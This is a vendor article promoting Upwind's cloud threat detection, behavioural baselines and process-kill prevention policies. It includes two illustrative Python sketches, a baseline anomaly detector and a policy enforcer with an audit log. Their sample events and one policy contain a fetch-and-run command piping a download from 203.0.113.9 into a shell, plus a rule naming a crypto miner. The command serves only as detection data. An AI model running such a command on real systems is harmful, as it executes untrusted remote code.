Upwind’s next-generation cloud security platform not only provides real-time risk analysis and threat detection, it also gives you the ability to respond to threats in real time.
In this article, we will dive deep into how Upwind detects threats in real time, our advanced methods of activity-based threat detection, and ways you can stop or prevent threats directly within the Upwind platform.
Upwind’s Advanced Threat Detection
Upwind’s real-time threat detection capabilities are powered by our high-performance Upwind eBPF sensor, which observes process, network (packet) and system-call activity in real time from inside the kernel. By doing so, Upwind is able to identify threats as they happen by monitoring the following:
- Processes: Monitor processes for suspicious activities, such as the execution of known malicious processes or processes with suspicious arguments.
- Network: Monitor network traffic on Layers 3, 4 and 7 for suspicious activities, such as unusual or unauthorized network traffic.
- Cloud logs: Monitor Kubernetes audit logs to detect threats in your cloud and Kubernetes environment.
- Files: Monitor files to detect suspicious or malicious file-related activities, such as file creation, modification, and deletion.
By leveraging real-time insights and machine learning, Upwind rapidly detects advanced threats, learns from behavior and alerts you to anomalies as soon as they appear in your environment.
Upwind Cloud Baselines
Upwind’s threat detection goes beyond traditional, signature-based methods with Upwind Cloud Baselines. A baseline is built by continuously observing an application’s activity over hours, days and weeks and training machine-learning (ML) models on that history, so that Upwind can distinguish “normal” from “abnormal” activity for each resource. This gives you a clearer picture of how a resource typically behaves and quickly surfaces deviations when they occur.
Upwind generates cloud baselines by first taking a comprehensive, DevOps-grade inventory of your cloud infrastructure and then continuously monitoring process executions, network communications, and file system accesses across Kubernetes workloads, serverless functions, and virtual machines using the Upwind eBPF sensor. The Upwind sensor also provides real-time insights into Layers 3, 4 and 7 of your network, giving you insights into normal activity for workloads, resources and APIs.
By generating cloud baselines, Upwind goes further than typical threat detection methods, such as scanning only for known malware signatures. Instead, it proactively identifies abnormal human and machine activity within your cloud environment, adding a layer of defense in depth for detecting and responding to potential threats, including ones for which no signature yet exists.
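To make the baseline idea concrete, here is a small, added example (not Upwind’s code) of the core mechanism: learn a workload’s normal process, network and file activity during a learning window, then flag any event outside that set. The event format, the workload names and the sample events are constructed assumptions; the real sensor would feed eBPF-derived events instead.

```python
"""Toy activity baseline: learn per-workload 'normal' process, network and file
activity during a learning window, then report deviations.
Added example, not Upwind's implementation. Event shape and sample data are
constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    ts: float       # seconds since epoch
    workload: str   # e.g. a Kubernetes deployment, Lambda function or VM name
    kind: str       # "process" | "network" | "file"
    detail: dict    # kind-specific attributes (assumed field names below)


def event_key(ev: Event) -> tuple:
    """Reduce an event to the attributes that define 'normal' for its kind.
    Ephemeral values (PIDs, source ports, timestamps) are deliberately dropped
    so they do not bloat the baseline or hide real deviations."""
    d = ev.detail
    if ev.kind == "process":
        return ("process", d["comm"], tuple(d.get("args", ())))
    if ev.kind == "network":
        return ("network", d["proto"], d["dst"], d["dport"])
    if ev.kind == "file":
        return ("file", d["op"], d["path"])
    raise ValueError(f"unknown event kind: {ev.kind}")


class Baseline:
    def __init__(self, learning_seconds: float):
        self.learning_seconds = learning_seconds
        self.first_seen: dict[str, float] = {}          # workload -> first event ts
        self.known: dict[str, set] = defaultdict(set)   # workload -> normal keys

    def observe(self, ev: Event):
        """Feed one event. Returns an anomaly record, or None when the event is
        within the baseline or the workload is still in its learning window."""
        start = self.first_seen.setdefault(ev.workload, ev.ts)
        key = event_key(ev)
        known = self.known[ev.workload]
        if ev.ts - start < self.learning_seconds:
            known.add(key)   # learning phase: everything observed is assumed normal
            return None
        if key in known:
            return None
        # Deliberately NOT added to the baseline: an analyst must triage first,
        # otherwise attacker activity becomes "normal" after a single alert.
        return {"workload": ev.workload, "ts": ev.ts, "deviation": key}


def detect(events, learning_seconds: float) -> list:
    """Replay events in time order through a fresh baseline; return anomalies."""
    base = Baseline(learning_seconds)
    return [a for ev in sorted(events, key=lambda e: e.ts) if (a := base.observe(ev))]


# Constructed sample: an nginx workload with one hour of learning, then a
# suspicious shell, an unknown egress destination and a write into /tmp.
SAMPLE_EVENTS = [
    Event(0,    "web", "process", {"comm": "nginx", "args": ["-g", "daemon off;"]}),
    Event(10,   "web", "network", {"proto": "tcp", "dst": "10.0.0.5", "dport": 5432}),
    Event(20,   "web", "file",    {"op": "open", "path": "/etc/nginx/nginx.conf"}),
    Event(3700, "web", "process", {"comm": "nginx", "args": ["-g", "daemon off;"]}),
    Event(3710, "web", "network", {"proto": "tcp", "dst": "10.0.0.5", "dport": 5432}),
    Event(4000, "web", "process", {"comm": "sh", "args": ["-c", "curl 203.0.113.9/x | sh"]}),
    Event(4010, "web", "network", {"proto": "tcp", "dst": "203.0.113.9", "dport": 443}),
    Event(4020, "web", "file",    {"op": "write", "path": "/tmp/.x"}),
    Event(4030, "db",  "process", {"comm": "postgres", "args": []}),  # new workload, still learning
]

if __name__ == "__main__":
    for anomaly in detect(SAMPLE_EVENTS, learning_seconds=3600):
        print(anomaly)
```

Two caveats a practitioner should keep in mind, both visible in the code: the learning window is trusted, so a workload that is already compromised when learning starts will have the attacker’s activity baked into its baseline, and anomalies are not auto-learned, so a noisy deployment will keep alerting until someone reviews and accepts the new behaviour.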
“Upwind’s ability to recognize abnormal behavior and correlate it with threats has opened new avenues for how we respond to potential breaches. The behavioral baselines feature has been instrumental in showing us exactly how our users and resources typically behave and immediately alerting us to deviations.”
Siim Kobin, Head of IT Operations, Tickmill
Stop Advanced Threats with Upwind
Whenever a new threat detection is raised in the Upwind platform, you are shown the relevant information, including severity, root cause and whether or not it is an active threat. For any active threat, regardless of severity, you can respond to it directly from the detection.
Kill Malicious Processes
Terminate the malicious process directly from the detection and stop it from causing further damage in your environment. Alongside the detection, Upwind shows you the process tree and the surrounding context, so you can confirm that the process is malicious before remediating it together with any child processes that stem from it.
This matters because you can kill not only a single malicious process, but the same malicious process running in several containers at once. This granular level of control lets you target the malicious process itself rather than the container it runs in, so you can secure your workloads rapidly without disrupting your cloud operations.
Create Prevention Policies
Upwind also lets you set prevention policies for one or more processes, with or without specific arguments, for a chosen timeframe. A policy can be created even if the process is not currently running, and for as long as it is in effect it will kill the matching process every time it attempts to re-spawn. This extends beyond one-off response: security teams can both stop a threat and keep it from returning, while developers and DevOps teams address the root cause.
Audit Trail
Using Upwind’s threat response and prevention capabilities, you can also track all current prevention settings, making it easy for teams to view all policies in one place. Upwind also keeps a response audit log, giving you the ability to identify who within your organization chose to use the response feature, when it was used and if it was successful.
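As an added example (not Upwind’s code) of what the two preceding sections describe, the sketch below evaluates prevention policies against a process snapshot, kills the matches, and emits an audit record per action recording who triggered it, when, and whether it succeeded. The `Policy` fields, the process record shape and the audit format are assumptions; the matching logic is kept pure so it can be exercised without killing anything, and only `enforce()` and `list_procs()` touch the operating system (Linux `/proc`).

```python
"""Prevention policies for re-spawning processes, plus a response audit log.
Added example, not Upwind's implementation. Policy fields, process records and
the audit record format are assumptions made for illustration."""
import os
import signal
import time
from dataclasses import dataclass
from typing import Callable, Optional, Sequence


@dataclass(frozen=True)
class Policy:
    name: str                        # basename of the executable to match
    args: Optional[tuple] = None     # None: kill regardless of arguments
    not_after: float = float("inf")  # policy is enforced only before this time

    def active(self, now: float) -> bool:
        return now < self.not_after

    def matches(self, argv: Sequence[str]) -> bool:
        if not argv or os.path.basename(argv[0]) != self.name:
            return False
        # With args set, require the exact argument vector so that a benign
        # invocation of the same binary (e.g. "sh -c 'echo ok'") is left alone.
        return self.args is None or tuple(argv[1:]) == self.args


@dataclass
class Proc:
    pid: int
    argv: list


def list_procs() -> list:
    """Snapshot running processes from /proc (Linux only). Processes that
    exit between listdir and read are skipped."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                raw = f.read()
        except OSError:
            continue
        argv = [a.decode(errors="replace") for a in raw.split(b"\0") if a]
        if argv:
            procs.append(Proc(int(entry), argv))
    return procs


def select_kills(policies, procs, now: float) -> list:
    """Return (proc, policy) pairs that an enforcement sweep should terminate.
    Expired policies are ignored; a process is reported once even if several
    policies match it."""
    hits, seen = [], set()
    for proc in procs:
        for pol in policies:
            if proc.pid not in seen and pol.active(now) and pol.matches(proc.argv):
                hits.append((proc, pol))
                seen.add(proc.pid)
    return hits


def enforce(policies, procs, now: float, actor: str,
            kill: Callable[[int], None] = lambda pid: os.kill(pid, signal.SIGKILL)) -> list:
    """One enforcement sweep. Kills every match and returns one audit record per
    attempt. Run it periodically (e.g. every second) so that a process which
    re-spawns is caught again until its policy expires."""
    audit = []
    for proc, pol in select_kills(policies, procs, now):
        try:
            kill(proc.pid)
            ok, err = True, None
        except OSError as e:          # already gone (respawn raced us) or no permission
            ok, err = False, e.__class__.__name__
        audit.append({"actor": actor, "ts": now, "policy": pol.name,
                      "policy_args": pol.args, "pid": proc.pid,
                      "argv": proc.argv, "killed": ok, "error": err})
    return audit


if __name__ == "__main__":
    # Dry run: show what a sweep WOULD kill on this host, without killing it.
    policies = [Policy("xmrig"), Policy("sh", args=("-c", "curl 203.0.113.9/x | sh"))]
    if os.path.isdir("/proc"):
        for proc, pol in select_kills(policies, list_procs(), time.time()):
            print(f"would kill pid {proc.pid} ({' '.join(proc.argv)}) under policy {pol.name}")
```

Note that matching on the executable basename is only as good as the attacker’s laziness: a miner renamed to `nginx` will not match `Policy("xmrig")`, which is why a policy should be paired with the behavioural detection that raised the alert rather than relied on alone.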
Learn More
Use Upwind’s activity-based Cloud Baselines, advanced threat detection and response capabilities, and threat prevention strategies to ensure proactive protection from threats. To learn more about Upwind’s threat detection & response capabilities, visit the Upwind Documentation Center (login required) or schedule a demo.